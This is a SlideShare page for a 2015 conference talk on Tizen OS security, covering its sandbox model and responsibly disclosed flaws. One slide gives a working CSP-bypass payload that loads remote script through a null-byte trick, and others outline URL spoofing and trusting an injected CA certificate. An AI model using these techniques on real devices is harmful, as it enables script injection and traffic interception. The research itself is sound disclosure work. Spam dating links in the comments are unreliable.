Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Hacking Tizen : The OS of Everything - Nullcon Goa 2015

6,842 views

Published on

Tizen is an operating system which is built to run on various kinds of devices. Tizen OS defines following profiles based on the devices types supported.

Tizen IVI (in-vehicle infotainment)
Tizen Mobile
Tizen TV, and
Tizen Wearable
Samsung's first Tizen-based devices are set to be launched in India in Nov 2014. This paper presents the research outcome on the security analysis of Tizen OS. The paper begins with a quick introduction to Tizen architecture which explains the various components of Tizen OS. This will be followed by Tizen's security model, where Application Sandboxing and Resource Access Control powered by Smack will be explained.

The vulnerabilities in Tizen identified during the research and responsibly disclosed to Tizen community will be discussed. This includes issues like Tizen WebKit2 Address spoofing and content injection, Buffer Overflows, Issues in Memory Protection like ASLR and DEP, Injecting SSL Certificate into Trusted Zone, (Shellshock) CVE-2014-6271 etc. Applications in Tizen can be written in HTML5/JS/CSS or natively using C/C++. Overview of pentesting Tizen application will be presented along with some of the issues impacting the security of Tizen application. There will be comparisons made to Android application, and how these security issues differ with Tizen.
For eg: Security issues with inter application communication with custom URL schemes or intent broadcasting in Android as opposed to using MessagePort API in Tizen. Issues with Webview & JavaScript Bridge in Android compared to how the web to native communication is handled with Tizen etc.
Tizen is late to enter into the market as compared to Android or iOS, which gives it the benefit of learning from the mistakes impacting the security of mobile OS, and fixing these issues right in the Security Architecture. To conclude, a verdict would be provided by the speaker on how much Tizen has achieved with regard to making this mobile OS a secure one.

Published in: Education
  • Dating direct: ❤❤❤ http://bit.ly/39sFWPG ❤❤❤
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Dating for everyone is here: ❶❶❶ http://bit.ly/39sFWPG ❶❶❶
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Hacking Tizen : The OS of Everything - Nullcon Goa 2015

  1. 1. Hacking TIZEN The OS of Everything AJIN ABRAHAM | @ajinabraham
  2. 2. whoami • Application Security Engineer ,Yodlee • Blogs at opensecurity.in • Spoken at NULLCON, ClubHack, OWASP AppSec AsiaPac, BlackHat Europe, Ground Zero Summit and few others • Loves to do and learn NEW things.
  3. 3. Disclaimer • All Images, Logos and Trademark belongs to their respective owners. • All vulnerabilities discussed are responsibly disclosed to Tizen Security community. • Personal View/Research, doesn’t reflect the views of my employer.
  4. 4. Agenda • Hacking Tizen *Android WebApp vs Tizen WebApp * Shellshock * DEP Gone! * ASLR Broken * CSP Bypassed * URL Spoofing/Content Injection • Pentesting Methodology * Static Analysis * Dynamic Analysis * Network Analysis • Security Concerns in Tizen • Conclusion • What is Tizen • Why Tizen? • Types of Tizen Application • Tizen Architecture • Tizen Application Structure • Tizen Security Model • Sandbox - SMACK – Simple Mandatory Access Control • WebKit2 on Tizen • Quick Comparison Android vs Tizen vs iOS
  5. 5. TIZEN : The OS of Everything Tizen –A Linux Foundation Project. The Concept of IoT (Internet of Things)
  6. 6. Why TIZEN ?
  7. 7. Source: http://ti mesofindia.indiatimes.com/tech/tech-news/Micromax-beats-Samsung-becomes-Indias- No-1-mobile-vendor-Report/articleshow/39630245.cms
  8. 8. Source: http://www.theverge.com/2013/11/12/5093588/tizen-open-operating-system-partners-with- 36-companies
  9. 9. History/Family
  10. 10. Types of Tizen Applications + Native Web Hybrid NATIVE NATIVE + WEB API + WEB API
  11. 11. Tizen Architecture Tizen Web Framework (HTML5 + Tizen Web API) Tizen Native Framework (C++ API) FrameworkCoreKernel Linux Kernel & Drivers Tizen Web App .wgt Tizen Native App .tpk
  12. 12. Web API = Standard HTML5 + Tizen Device API
  13. 13. Tizen Application Structure • Native Apps • Web Apps • Hybrid Apps
  14. 14. Install Directory
  15. 15. Native App (.tpk) Install Location .tpk
  16. 16. Web App (.wgt)
  17. 17. Hybrid App (.wgt)
  18. 18. Tizen Security Model • Non root applications • All applications run under same non-root user ID app • Most of the middleware daemons will run as non-root user. • Application sandboxing • All applications are sandboxed by SMACK. • Each application unable to send IPC and sockets, r/w other application files. • Permission Model/Least privilege • All applications will have manifest file describing privileges. • Manifest file describes SMACK labels and rule of the application to get proper privileges • Tizen CSP for Web Apps • Encrypt HTML, JS and CSS stored in Device - Encrypts at Install time and Runtime decryption. • Content Security Framework by McAfee – Provides API for AVs.
  19. 19. SMACK : Simple Mandatory Access Control Kernel Web app 1 Native App (uid: app) Native Framework Kernel Web Runtime (uid: app) Some Daemon (uid:root) SMACK LABEL Web app 2 Web1 Web2 Native1 Daemon File System Web1 Web2 Native 1 Basic Rule : “what's mine is mine; what's yours is yours.” SMACK allows you to add controlled exception to this basic rule.
  20. 20. SMACK : Simple Mandatory Access Control Kernel SMACK Terms: – Subject  Any Running Process (Have Smack Label) – Object  File, IPC, Sockets, Process – Access  Read (r), Write (w), Execute (e), Append (a) , Lock (l), Transmute (t) -- Label • Just valid ASCII characters with no meaning, “security tag” applied to subjects (i.e., processes) and objects (i.e., filesystem objects, sockets, processes). The label of a running process is called it’s Context. 41,000 SMACK Rules in Tizen 2.2.1 !! From Tizen 3.X: ( Smack Three domain Model, Cynara) https://wiki.tizen.org/wiki/Security:Cynara
  21. 21. Native Apps – manifest.xml
  22. 22. Web Apps – config.xml
  23. 23. WebKit2 on Tizen • Tizen WebApps runs on WebKit2 • New API Layer over WebKit • Supports Split Process Model, Like your Chrome Tabs
  24. 24. Quick Comparison Tizen • Users identified by UID (app) • Permission: Manifest.xml & Config.xml • MessagePort IPC using socket • SMACK & CSP • Content Security Framework • Signed by Developer & Distributor Android • Apps identified by UID • Permission : AndroidManifest.xml • Binder IPC using Intents • SELinux • Signed by Developer iOS • All Apps run under user “mobile”. • No permission model. Ask for Permission at Runtime. • Mach Ports/ Distributed Notifications/ Distributed Objects/ AppleEvents & AppleScript/Pasteboard/XPC based IPC • Powerbox, Seatbelt • Signed by Distributor
  25. 25. Enough! Let’s Hack Tizen Research Focus • Tizen WebApps • Tizen OS Memory Protection • Tizen CSP and WebKit
  26. 26. Android Web App vs Tizen Web App • Tizen Web Apps are powerful and feature rich. • In Android Web Apps in WebView and can interact with Device features using addJavascriptInterface. • In Tizen, It provides Web API that allows to leverage Device features and are restricted using permissions and CSP.
  27. 27. Over privileged: Android Web App vs Tizen Web App WebView BLUETOOTH Android Tizen WebApp DEVELOPER EXPOSES API TO BRIDGE BLUETOOTH PERMISSION ADDJAVASCRIPTINTERFACE NFC BLUETOOTH PRIVILEGE NFC PRIVILEGENFC PERMISSION NFCBLUETOOTH BLUETOOTH API NFC API
  28. 28. Android Web App vs Tizen Web App WebView BLUETOOTH Android Tizen WebApp DEVELOPER EXPOSES API TO BRIDGE BLUETOOTH PERMISSION ADDJAVASCRIPTINTERFACE NFC BLUETOOTH PRIVILEGE NFC PRIVILEGENFC PERMISSION NFCBLUETOOTH XSS XSS CSP BLUETOOTH API NFC API
  29. 29. Shellshock!
  30. 30. DEP – Gone! • When Data Execution Prevention is enabled. data on stack should be non-executable. • Prevents Shellcode at Stack from Executing. • But DEP is not seen in action.
  31. 31. DEMO
  32. 32. • As per documentation ASLR is fully implemented in Tizen 2.1 itself. • Already Broken in Tizen 2.2.1 , discovered by Shuichiro Suzuki • /proc/sys/kernel/randomize_va_space is set to 2 which tell us that ASLR is enabled. • But as the personality value of /proc/self/personality is set to 00040000. which corresponds to (ADDR_NO_RANDOMIZE) disables ASLR. • Issue is patched in Tizen 2.2 by setting /proc/self/personality to 00000000 • PIE (position-independent executable). So this will make all the native application ASLR enabled by default. • But due to implementation issues, it was still found that ASLR is still in broken state. • /proc/<pid>/maps –Address of heap, stack and main modules remain the same. ASLR Broken!
  33. 33. DEMO
  34. 34. ASLR Broken!
  35. 35. URL Address Spoofing/Content Injection • Open a new window with URL https://facebook.com and assign it to a variable w. • Try to write “<h1>You 've been Hacked</h1>” to DOM using w.document.write() • Focus the window corresponding to w.
  36. 36. DEMO
  37. 37. CSP Bypass <script> a=document.createElement('script'); a.id='x'; a.src='u0000https://rawgit.com/ajinabraham/PoC/master/script.js'; document.body.appendChild(a); </script> Content-Security-Policy: default-src 'self’; script-src 'self’ ‘unsafe-inline’; • We create a script tag with JavaScript nullbyte prepended to a SCRIPT URL. • Tricks the browser and load the Script from a different domain and Bypass CSP.
  38. 38. DEMO
  39. 39. Pentesting Methodology • Whitebox: Access to Source and Knowledge about the application • Blackbox: No access to Source and no idea about the application • Static Analysis • Dynamic Analysis • Network Analysis
  40. 40. Static Analysis • Certificate Signature Analysis – Developer and Distributor • Manifest Analysis – manifest.xml/config.xml • Unwanted Privileges. • CSP is proper or not. • Smack Labels and Rules • Directories/ Files/DB with chmod 777 access. • Code Review • Weak Encryption, Crypto • Plaintext Information • SSL Overriding • Writing to SD Card / External Storage – World Readable • Sqlite is used so Client Side SQLi.
  41. 41. Dynamic Analysis • Run the App in Tizen VM or Web Simulator • Sensitive data shared during IPC, Sensitive files written at Runtime, Temp files etc. • Tools: Dynamic Analyzer much like android ddms/Android Device Monitor, sdb – The adb equivalent for Tizen.
  42. 42. Network Analysis • Installing SSL Certificate and HTTPS Traffic Decryption with a Proxy like Burp or Fiddler • OWASP Top 10 Web Risks • XSS + Improper CSP = JavaScript can directly access device functionalities provided permissions are there.
  43. 43. Installing CA Certificate for HTTPS Traffic Decryption • Trusted CA Certificates are stored under /etc/ssl/certs • Filename: <8HEXChars.0> in PEM format. • Copy the CA certificate to /etc/ssl/certs and it’s trusted.
  44. 44. Security Concerns • WebKit = Bugs!! • WebKit is basically a collection of use-after-frees that somehow manages to render HTML (probably via a buffer overflow in WebGL) -the grugq • HTML Web API is there, Improper CSP and XSS=owned !! • Too much SMACK Rules – High chance that developers will mess up. Will be reduced from Tizen 3.
  45. 45. Conclusion • Security Model/Architecture wise they put lot of effort compared to Android or other devices out their. • They made it so complex that people can easily mess up • Looks promising if they can fix similar implementation bugs like this.
  46. 46. Thanks! Thanks to my awesome manager Sachin, for all the support and encouragement to carry out this research. @ajinabraham

×